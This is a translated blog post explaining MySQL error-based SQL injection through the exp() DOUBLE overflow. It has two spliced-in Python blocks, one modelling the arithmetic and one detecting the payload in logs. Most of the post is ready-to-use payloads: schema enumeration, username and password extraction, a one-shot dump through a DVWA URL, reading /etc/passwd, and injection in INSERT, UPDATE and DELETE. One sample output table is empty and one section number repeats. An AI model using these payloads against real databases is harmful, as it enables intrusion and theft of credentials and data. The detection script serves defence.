Using EXP for SQL error injection

Source: Internet
Author: User
Tags: bitwise, mathematical functions, sql error

0x01 Preface Overview

Good news: the author has found another data-type overflow in MySQL, this time in DOUBLE. Readers who want the background on using an overflow to leak data can read the author's earlier post, BIGINT Overflow Error based injections; drops also carries a translation of it (see here). Going through MySQL's built-in functions, the author was most interested in the mathematical ones, since each must hold its result in some data type that can overflow. So the author tested which of them raise an overflow error, and found that exp() raises one as soon as its argument is greater than 709.

mysql> select exp(709);
+-----------------------+
| exp(709)              |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

In MySQL, exp() is the inverse of ln() and log(). Briefly, log() (with a single argument) and ln() both return the natural logarithm, base e, of their argument:

mysql> select log(15);
+------------------+
| log(15)          |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)

mysql> select ln(15);
+------------------+
| ln(15)           |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)

The exponential function is the inverse of the logarithm: exp(x) returns e raised to the power x, so it undoes the base-e logarithm above, for example:

mysql> select exp(2.70805020110221);
+-----------------------+
| exp(2.70805020110221) |
+-----------------------+
|                       |
+-----------------------+
1 row in set (0.00 sec)

0x02 Injection

For injection we use bitwise negation to provoke the "DOUBLE value is out of range" error. As the author's previous post explained, the bitwise negation of 0 returns 18446744073709551615; and because a function that executes successfully evaluates to 0 in this context, negating it gives the maximum unsigned BIGINT value.

mysql> select ~0;
+----------------------+
| ~0                   |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)

mysql> select ~(select version());
+----------------------+
| ~(select version())  |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)

Combining a subquery with bitwise negation and passing the result to exp() produces a DOUBLE overflow error whose message quotes the subquery's result, and that is what leaks the data.

' exp(~(select*from(select user())x))

mysql> select exp(~(select*from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

0x03 Extracting data
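The two mechanisms the post has described so far, the exp() overflow threshold of 0x01 and the bitwise-negation trick of 0x02, can be reproduced numerically without a database. The following model is an added example written for this page, not code from the original post or from MySQL; its string-to-integer coercion is a deliberately simplified assumption (leading integer prefix, otherwise 0) and its error text mirrors the server's wording only for illustration.

```python
import math
import sys

UINT64_MAX = 2**64 - 1        # 18446744073709551615: the unsigned BIGINT ceiling (~0 in MySQL)
DBL_MAX = sys.float_info.max  # 1.7976931348623157e308: the IEEE-754 double ceiling


def exp_overflow_threshold():
    """Largest argument for which e**x still fits in a double: ln(DBL_MAX), about 709.78.
    That is why exp(709) succeeds and exp(710) raises error 1690."""
    return math.log(DBL_MAX)


def mysql_exp(x):
    """Model of MySQL 5.5.5+ EXP(): return e**x, or raise with the server's wording once the
    result exceeds DBL_MAX (servers before 5.5.5 silently returned 1.#INF instead)."""
    try:
        return math.exp(x)
    except OverflowError:
        raise ValueError(f"DOUBLE value is out of range in 'exp({x})'") from None


def exp_overflows(x):
    """True when mysql_exp(x) would raise the range error."""
    try:
        mysql_exp(x)
    except ValueError:
        return True
    return False


def mysql_int_cast(value):
    """Simplified model (an assumption, not MySQL source) of how unary ~ coerces its operand:
    integers pass through, strings keep their leading integer prefix, anything without one
    becomes 0. So user() ('root@localhost') -> 0 and version() ('5.5.47-log') -> 5."""
    if isinstance(value, int):
        return value
    digits = ""
    for ch in str(value).strip():
        if ch.isdigit() or (ch == "-" and not digits):
            digits += ch
        else:
            break
    return int(digits) if digits not in ("", "-") else 0


def bitwise_not(value):
    """Model of MySQL's unary ~: 64-bit unsigned complement of the coerced integer."""
    return (~mysql_int_cast(value)) & UINT64_MAX


def roundtrip_ln_exp(v):
    """exp() undoes ln(): exp(ln(v)) returns v (up to floating-point rounding)."""
    return mysql_exp(math.log(v))


if __name__ == "__main__":
    print("threshold ln(DBL_MAX) =", exp_overflow_threshold())
    print("exp(709) =", mysql_exp(709))
    print("~0 =", bitwise_not(0), "-> exp overflows:", exp_overflows(bitwise_not(0)))
    print("~'5.5.47-log' =", bitwise_not("5.5.47-log"))
```

The model makes the defender's point explicit: the error is triggered purely by the magnitude of ~value, which is at least 2^63 for any small non-negative operand, so any place where a string result can reach exp() or ~ unparameterised is enough; the fix is binding values as parameters rather than filtering specific function names.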

Get Table name:

select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));

Get Column Name:

select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));

Retrieving data:

select exp(~(select*from(select concat_ws(':',id,username,password) from users limit 0,1)x));

0x04 Dump in one shot (DIOS)

The following query dumps all tables and columns of the current database in one go. All databases could be dumped the same way, but because the data travels through an error message, only a limited amount of it is returned.

exp(~(select*from(select concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)x))

http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)x))-- -&Submit=Submit#

0x04 Read File

Files can be read through the load_file() function, but the author found that the output is limited to 13 lines. The same statement also works with the BIGINT overflow injection.

select exp(~(select*from(select load_file('/etc/passwd'))a));

Note that writing files this way is not possible, because only a 0 ends up in the output file.

mysql> select exp(~(select*from(select 'hello')a)) into outfile 'c:/out.txt';
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'hello' from dual)))'

# type C:\out.txt
0

0x05 Injection in Insert

Step by step:

mysql> insert into users (id, username, password) values (2, '' ^ exp(~(select*from(select user())x)), 'Eyre');
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

The same DIOS query can be used in insert, update and delete statements.

mysql> insert into users (id, username, password) values (2, '' | exp(~(select*from(select concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)x)), 'Eyre');
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '000newdb::users::id
newdb::users::username
newdb::users::password' from dual)))'

0x06 Injection in Update

mysql> update users set password='Peter' ^ exp(~(select*from(select user())x)) where id=4;
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

0x07 Injection in Delete

mysql> delete from users where id='1' | exp(~(select*from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

0x08 Summary

Like the BIGINT overflow injection, the exp() injection works on MySQL 5.5.5 and above. Earlier versions are "silent" about this condition: they return infinity instead of raising an error.

mysql> select version();
+---------------------+
| version()           |
+---------------------+
| 5.0.45-community-nt |
+---------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
+----------+
| exp(710) |
+----------+
|   1.#INF |
+----------+
1 row in set (0.00 sec)

mysql> select exp(~0);
+---------+
| exp(~0) |
+---------+
|  1.#INF |
+---------+
1 row in set (0.00 sec)
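From the defender's side, everything in this post leaves two distinctive traces: the request carries exp( wrapped around a negated subquery, and the database answers with error 1690 whose text quotes the leaked value. The script below, an added example that is not part of the original post, scans both. The access-log and application-log lines are constructed for the example (the request in them is the DVWA URL shown in 0x04), and the log formats, the field names and the assumption that the application writes the raw MySQL error into its own log are assumptions for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request-side signature: exp( applied to a bitwise-negated subquery. Whitespace between the
# tokens is tolerated and matching is case-insensitive, since the post itself mixes cases.
EXP_NEG_SUBQUERY = re.compile(r"exp\s*\(\s*~\s*\(\s*select\b", re.IGNORECASE)

# Database-side signature: MySQL error 1690 (SQLSTATE 22003) naming exp( as the failing expression.
ERROR_1690_EXP = re.compile(
    r"ERROR 1690 \(22003\): DOUBLE value is out of range in 'exp\(", re.IGNORECASE
)

# Constructed sample data (not real traffic). Apache combined-style access log lines:
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4215',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+or+exp%28~%28select*from%28select+user%28%29%29x%29%29--+-&Submit=Submit HTTP/1.1" 200 612',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+or+EXP+%28~+%28SELECT*FROM%28select+table_name+from+information_schema.tables+limit+0,1%29x%29%29--+-&Submit=Submit HTTP/1.1" 200 640',
    '10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /search?q=exp+date HTTP/1.1" 200 1200',
]

# Constructed application log lines (assumed format: timestamp, process, free text):
SAMPLE_APP_LOG = [
    "2024-01-01 10:00:07 app[1234]: query failed: ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'",
    "2024-01-01 10:00:30 app[1234]: query ok: 1 row",
]


def decode_request(line):
    """URL-decode the log line so the regex sees the SQL the database saw (%28 -> '(', + -> space)."""
    return unquote_plus(line)


def flag_requests(lines):
    """Return access-log lines whose decoded request contains the exp(~(select signature."""
    return [line for line in lines if EXP_NEG_SUBQUERY.search(decode_request(line))]


def flag_db_errors(lines):
    """Return application-log lines carrying error 1690 raised inside exp()."""
    return [line for line in lines if ERROR_1690_EXP.search(line)]


def leaked_value(error_line):
    """Extract the quoted subquery result from an error 1690 line, so incident response can
    record exactly what the error message disclosed. Returns None if the line has no such quote."""
    match = re.search(r"\(select '(.*?)' from dual\)", error_line, re.DOTALL)
    return match.group(1) if match else None


def source_ips(flagged_lines):
    """Distinct client addresses (first field of each flagged access-log line), in first-seen order."""
    seen = []
    for line in flagged_lines:
        ip = line.split(" ", 1)[0]
        if ip not in seen:
            seen.append(ip)
    return seen


if __name__ == "__main__":
    hits = flag_requests(SAMPLE_ACCESS_LOG)
    print(f"{len(hits)} suspicious request(s) from {source_ips(hits)}")
    for err in flag_db_errors(SAMPLE_APP_LOG):
        print("error 1690 disclosed:", leaked_value(err))
```

Seeing error 1690 in the application log is the stronger signal of the two: it means a user-controlled value reached exp() unparameterised, regardless of how the request was encoded. The request-side match is useful for blocking and for attributing the source, but the durable fix is binding query parameters and never echoing the database's error text back to the client, which removes the channel the post relies on.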
